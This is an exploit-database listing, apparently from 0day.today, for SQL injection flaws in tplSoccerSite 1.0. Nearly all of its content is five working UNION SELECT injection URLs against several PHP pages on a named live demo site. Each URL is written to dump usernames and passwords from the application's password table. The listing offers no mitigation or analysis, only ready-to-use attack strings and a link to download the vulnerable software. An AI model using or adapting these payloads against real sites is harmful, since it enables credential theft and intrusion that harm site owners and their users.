[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Author
Mr.SQL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3420
Category
web applications
Date add
15-07-2008
Platform
unsorted
===============================================================
tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities
===============================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## tplSoccerSite 1.0 ( player.php id )
##                            
###############################################################
########################
########################
##
## -[[: L!VE DEMO :]]-
##
## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELECT+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FROM+tplss_passwords/*
## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELECT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+FROM+tplss_passwords/*
## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_passwords/*
## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/*
## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UNION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tplss_passwords/*
##
########################
########################
 -[[ NOTE ]]-
1 ) Download [[ tplSoccerSite 1.0 ]]   http://www.tpl-design.com/download/tpl_ss_10_free.zip
 
#######################################################################################################



#  0day.today [2024-12-23]  #